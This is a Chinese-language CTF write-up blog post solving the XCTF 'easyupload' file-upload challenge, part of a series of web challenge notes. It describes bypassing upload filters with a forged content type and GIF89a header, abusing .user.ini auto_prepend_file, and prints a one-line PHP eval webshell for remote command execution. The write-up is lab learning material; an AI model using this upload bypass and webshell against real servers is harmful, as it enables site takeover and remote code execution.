CTFer成长记录——CTF之Web专题·攻防世界—easyupload

合集 - CTF之web专题(37)

1.CTFer成长记录——web专题·本地访问网址2023-06-262.CTFer成长记录——web专题·一句话木马2023-06-273.CTFer成长记录——Web专题·从cookie中获取信息2023-06-274.CTFer成长记录——Web专题·双写绕过2023-06-275.CTFer成长记录——Web专题·robots协议2023-06-286.CTFer成长记录——Web专题·Linux中的.swp文件2023-06-297.CTFer成长记录——Web专题·修改页面元素2023-06-298.CTFer成长记录——Web专题·判断绕过2023-07-099.CTFer成长记录——CTF之Web专题·初识反序列化2023-07-1410.CTFer成长记录——CTF之Web专题·攻防世界-PHP22023-07-2011. CTFer成长记录——CTF之Web专题·bugku-Simple_SSTI_22023-07-2412.CTFer成长记录——CTF之Web专题·bugku-eval2023-07-2413.CTFer成长记录——CTF之Web专题·bugku-变量12023-07-2714.CTFer成长记录——CTF之Web专题·[ACTF2020 新生赛]Include2023-07-2715. CTFer成长记录——CTF之Web专题·bugku—备份是个好习惯2023-07-28

16.CTFer成长记录——CTF之Web专题·攻防世界—easyupload2023-07-29

17.CTFer成长记录——CTF之Web专题·攻防世界—fileinclude·好多文件呀2023-07-2918.CTFer成长记录——CTF之Web专题·攻防世界—easyphp2023-07-2919. CTFer成长记录——CTF之Web专题·buuctf—secretfile2023-07-2920.CTFer成长记录——CTF之Web专题·19强网杯—随便注2023-07-3021.CTFer成长记录——CTF之Web专题·攻防世界—file_include2023-07-3122.CTFer成长记录——CTF之Web专题·攻防世界—unseping2023-07-3123.CTFer成长记录——CTF之Web专题·攻防世界—NewsCenter2023-07-3124.CTFer成长记录——CTF之Web专题·极客大挑战 2019—http2023-08-0225.CTFer成长记录——CTF之Web专题·极客大挑战—Upload2023-08-0226.CTFer成长记录——CTF之Web专题·极客大挑战—BabySQL2023-08-0327.CTFer成长记录——CTF之Web专题·攻防世界-Web_python_template_injection2023-08-0428.CTFer成长记录——CTF之Web专题·攻防世界-Web_php_unserialize2023-08-0729.CTFer成长记录——CTF之Web专题·攻防世界-php_rce2023-08-0730.CTFer成长记录——CTF之Web专题·攻防世界-Web_php_include2023-08-0731. CTFer成长记录——CTF之Web专题·buuctf-easy_tornado2023-08-0832.CTFer成长记录——CTF之Web专题·攻防世界—lottery2023-08-1033. CTFer成长记录——CTF之Web专题·攻防世界—ics-052023-08-1034.CTFer成长记录——CTF之Web专题·buuctf—admin2023-08-1035.CTFer成长记录——CTF之Web专题·buuctf—Cookies2023-08-1836. CTFer成长记录——CTF之Web专题·bugku—never_give_up2023-08-1837.CTFer成长记录——CTF之Web专题·[SWPUCTF 2021 新生赛]jicao2023-09-30

收起

一、题目链接

https://adworld.xctf.org.cn/challenges/list

二、解法步骤

  这题一道文件上传题，本题考的是利用.user.ini文件的特性，实现任意命令执行。在测试该文件上传是白名单还是黑名单，我们可以随便上传一个文件后缀，只要不通过就是白名单检测。

    .user.ini。它比.htaccess用的更广，不管是nginx/apache/IIS，只要是以fastcgi运行的php都可以用这个方法。
使用方法：
    指定一个文件，自动包含在要执行的文件前，类似于在文件前调用了require()函数。
    auto_prepend_file=01.gif    //01.gif是你要上传的文件

   所以，我们可以借助.user.ini轻松让所有php文件都自动包含某个文件，而这个文件可以是一个正常php文件，也可以是一个包含一句话的webshell。

  于是我们将auto_prepend_file=1.jpg写入一个空的.txt文件中，然后改名改后缀为.user.int，接着将这个文件上传。注意：直接上传是不行的，需要bp抓包，修改请求包中的文件类型，用来绕过白名单检测：注意由于该题会对文件内容进行解析，所以要加上GIF89a这个文件欺骗头，让上传系统误认为我们上传的是图片。

 最后显示上传成功。

然后就上传webshell即可：（上传的是1.jpg名称，要和.user.ini中后的文件名相同）

GIF89a //也需要包含文件欺骗头
<?=eval($_POST['cmd']);?>
//注意这里如果是<?php ?> 格式上传也是不成功的。

  

  最后找到文件路径：xxx.uploads/index.php

　　用蚂剑连接即可：

三、总结

  本题的文件上传是新知识，有对.user.ini的利用和一句话木马的格式改写，应当积累下来。